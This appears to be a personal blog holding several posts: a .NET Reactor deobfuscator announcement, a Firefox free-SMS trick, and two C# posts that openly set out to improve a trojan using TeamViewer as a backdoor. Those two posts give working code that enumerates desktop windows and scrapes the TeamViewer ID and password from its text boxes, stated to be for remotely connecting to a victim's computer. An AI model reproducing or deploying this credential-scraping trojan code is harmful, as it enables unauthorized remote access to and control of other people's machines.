DeReactor – Tool to deobfuscate .Net Reactor assembly

Yesterday, I visited forum of RETEAM and found a thread asking which obfuscator is applied on the target. So curious, I downloaded the target and try to identify with my tool .Net Id and he could not identify which packer was used. The packer used for the target is .Net Reactor. My tool does not work because  of my programming fault. I fixed it and it works again. I already added a new signature for PE Compact. During analyzing the assembly, I found that it is not difficult to write a tool to deobfuscate the target. Therefore I started to write DeReactor to deobfuscate .Net Reactor.

As you know, the obfuscator obfuscate all of functions, variable’s name, encrypt string and flow control. DeReactor will help you to achieve an assembly with easy-to-read source code.

Flow control

.Net Reactor uses a simple tip to anti-decompile with .Net Reflector. He just added 3 instructions before each method so that Reflector confuses. They are  ‘branch’, ‘pop’ and ‘load int 0’ instructions as you can see in the figure below:

This trick is also used in many other obfuscators. They just add some useless instructions in the header of each method and then put jump command to entry point at the top. With this way, they did not destroy or obfuscate any flow control but this trick can prevent Reflector from decompiling. This trick is pretty weak against an expert reverser but it is a good candidate to fight against script kiddie. It is also pretty simple to implement.

Encrypt string

The second feature of .Net Reactor is that it will encrypt all of string into a unreadable form so that the reverser has no clue to find which he really wants. The way.Net Reactor works to decrypt the string during executing is pretty simple. He just encrypt the clear text and replace the clear text with encrypted one. Then inserted the decrypt function below this ‘ldstr’ instruction and this function will decrypt the string to original form and gives it back to the program as the figure below.

There are still a lot of things to do with this tool. But I hope in this beta version it will help you a little so that you can analyze your assembly easier.

C# – How to get ID and Pass of TeamViewer programatically?

As I said in my previous blog, I am improving a funny trojan which uses TeamViewer as its component to open a back door from victim’s machine. In this blog I would like to post a small snippet of code to show how we can get ID and Pass from window of TeamViewer. This ID and Pass are needed for building a remote connection to victim’s computer.

The function GetDesktopWindowsTitles you can see in previous blog. In this example I used overload of SendMessage function to get text length and text of each textbox. There are also many overload of SendMessage function. Each of them can be used for suitable window messages. If you can find more overload of SendMessage at Pinvoke site.

// Find window by Caption only. Note you must pass IntPtr.Zero as the first parameter.
[DllImport("user32.dll", EntryPoint = "FindWindow", SetLastError = true)]
static extern IntPtr FindWindowByCaption(IntPtr ZeroOnly, string lpWindowName);
[DllImport("user32.dll", SetLastError = true)]
public static extern IntPtr FindWindowEx(IntPtr parentHandle, IntPtr childAfter, string className, IntPtr windowTitle);
[DllImport("user32.dll", CharSet = CharSet.Auto)]
static extern IntPtr SendMessage(IntPtr hWnd, UInt32 Msg, IntPtr wParam, IntPtr lParam);
[DllImport("user32.dll", CharSet = CharSet.Auto)]
static extern IntPtr SendMessage(IntPtr hWnd, UInt32 Msg, int wParam,StringBuilder lParam);
static void Main()
{
	string[] strWindowsTitles = GetDesktopWindowsTitles();
	string strTeamViewer = "";
	foreach (string strTitle in strWindowsTitles)
	{
		if (strTitle.Contains("TeamViewer"))
		{
			if (strTitle == "TeamViewer")
			{
				strTeamViewer = strTitle;
				break;
			}
		}
	}

	if (strTeamViewer != "")
	{
		IntPtr hWndTeamViewer = FindWindowByCaption(IntPtr.Zero, strTeamViewer);

		IntPtr hWndID = FindWindowEx(hWndTeamViewer, IntPtr.Zero, "Edit", IntPtr.Zero);
		IntPtr hWndPass = FindWindowEx(hWndTeamViewer, hWndID, "Edit", IntPtr.Zero);

		IntPtr pLengthID = SendMessage(hWndID, WM_GETTEXTLENGTH, IntPtr.Zero, IntPtr.Zero);
		IntPtr pLengthPass = SendMessage(hWndPass, WM_GETTEXTLENGTH, IntPtr.Zero, IntPtr.Zero);

		StringBuilder strbID = new StringBuilder((int)pLengthID);
		StringBuilder strbPass = new StringBuilder((int)pLengthPass);

		IntPtr pID = SendMessage(hWndID, WM_GETTEXT, (int)pLengthID, strbID);
		IntPtr pPass = SendMessage(hWndPass, WM_GETTEXT, (int)pLengthPass, strbPass);

		Console.WriteLine(strbID.ToString());
		Console.WriteLine(strbPass.ToString());
		Console.ReadLine();
	}
}

You can note that at getting Handle of the Pass textbox , I give the Handle of ID textbox as argument ChildAfter to tell the FindWindowEx function that he should take the textbox right after ID textbox. The source code is pretty simple and easy to understand.

C# – How to enumerate all opened windows?

Yesterday I read a blog post at Benina’s blog about a funny trojan. This trojan use TeamViewer to open a back door so that the attacker can access and control the victim’s machine. What I am interested in this trojan is how he gets the ID and Pass from TeamViewer. I took a look at the source code and found out that the author uses a simple SendMessage command to get text from textbox.

I would like to improve this trojan so that it will automatically find out which window belongs to TeamViewer and send command to that window because the author used hard code to find windows of TeamViewer.

public class EnumerateOpenedWindows
{
const int MAXTITLE = 255;

private static List<string> lstTitles;

private delegate bool EnumDelegate(IntPtr hWnd, int lParam);

[DllImport("user32.dll", EntryPoint = "EnumDesktopWindows",
ExactSpelling = false, CharSet = CharSet.Auto, SetLastError = true)]
private static extern bool EnumDesktopWindows(IntPtr hDesktop,
EnumDelegate lpEnumCallbackFunction, IntPtr lParam);

[DllImport("user32.dll", EntryPoint = "GetWindowText",
ExactSpelling = false, CharSet = CharSet.Auto, SetLastError = true)]
private static extern int _GetWindowText(IntPtr hWnd,
StringBuilder lpWindowText, int nMaxCount);

[DllImport("user32.dll")]
[return: MarshalAs(UnmanagedType.Bool)]
static extern bool IsWindowVisible(IntPtr hWnd);

private static bool EnumWindowsProc(IntPtr hWnd, int lParam)
{
string strTitle = GetWindowText(hWnd);
if (strTitle != "" & IsWindowVisible(hWnd)) //
{
lstTitles.Add(strTitle);
}
return true;
}

/// <summary>
/// Return the window title of handle
/// </summary>
/// <param name="hWnd"></param>
/// <returns></returns>
public static string GetWindowText(IntPtr hWnd)
{
StringBuilder strbTitle = new StringBuilder(MAXTITLE);
int nLength = _GetWindowText(hWnd, strbTitle, strbTitle.Capacity + 1);
strbTitle.Length = nLength;
return strbTitle.ToString();
}

/// <summary>
/// Return titles of all visible windows on desktop
/// </summary>
/// <returns>List of titles in type of string</returns>
private static string[] GetDesktopWindowsTitles()
{
lstTitles = new List<string>();
EnumDelegate delEnumfunc = new EnumDelegate(EnumWindowsProc);
bool bSuccessful = EnumDesktopWindows(IntPtr.Zero, delEnumfunc, IntPtr.Zero); //for current desktop

if (bSuccessful)
{
return lstTitles.ToArray();
}
else
{
// Get the last Win32 error code
int nErrorCode = Marshal.GetLastWin32Error();
string strErrMsg = String.Format("EnumDesktopWindows failed with code {0}.", nErrorCode);
throw new Exception(strErrMsg);
}
}

static void Main()
{
string[] strWindowsTitles = GetDesktopWindowsTitles();
foreach (string strTitle in strWindowsTitles)
{
Console.WriteLine(strTitle);
}
Console.ReadLine();
}
}

In the source code above I used EnumDesktopWindows API to list all opened Windows, the GetWindowText API to get title of each window and IsWindowsVisible to filter to only visible windows. There is one thing that I still can not understand is the result which EnumDesktopWindows returns. It returns many strange output which I really can not understand. For example, I am using Yahoo Messenger and in the list of opened windows, I see a title of a window which is the status of my friend in Yahoo Messenger.

I will ask some experts about this problem. If you know please share with me.

How to send free SMS with Firefox?

It’s a long time since I wrote my previous blog because I was pretty busy with my master thesis. I am now graduated and free. :D. So yesterday I decided to try new Windows 7 Ultimate. The current Windows version I am using is Windows Vista 32 bits. I would like to use Windows 7 64 bit so that I can make use of 4 Gb RAM. So I decided to download a 64 bit version of Windows 7 and as the consequence I can not run the setup CD under 32 bit Vista. :(. I am really stupid. Therefore I must setup a completely new Windows 7 and all of settings went with the wind too. One of the most applications which I lost is the add-on of Firefox to send free SMS over the word. I forgot its name. I spent some minutes to search again so I decided to archive it through my blog.

To send free SMS to any country we need.

1. A mobil phone.

2. Internet connection.

3. Firefox.

And follow these steps to send a free SMS to anyone in any country.

1. Go to http://mjoy.com and register an account. You need to enter a your valid mobil phone number to receive the confirmation code. Do not be afraid of loosing any money. I used this service for a long time and I find it ok.

2. Open Firefox and install User Agent Switcher add-ons.

3. In Firefox, go to Menu Tools –> Add-ons –> User Agent Switcher and choose Settings

4. On the new dialog, click New to create new Agent and enter the information as image below.

Description: Nokia 5300

User Agent: Nokia5300/2.0 (05.51) Profile/MIDP-2.0 Configuration/CLDC-1.1. 314

5. After creating new Agent successfully. In Firefox go to menu Tools –> User Agent Switcher and choose Nokia 5300.

6. Go to site http://mjoy.com you will see this log on screen. Use the confirmation code which you created before to create an account and then login. Now you can send free SMS to anywhere.

7. After sending SMS remember to turn your agent back to Default agent. The mobile phone number which you want to send to must consists of course the code of country before it. For example the code of Vietnam is +84, the number should be something like this +84984957271. Enjoy yourself.

List of websites allowing sending SMS over the world
http://freesms.dailysms.me/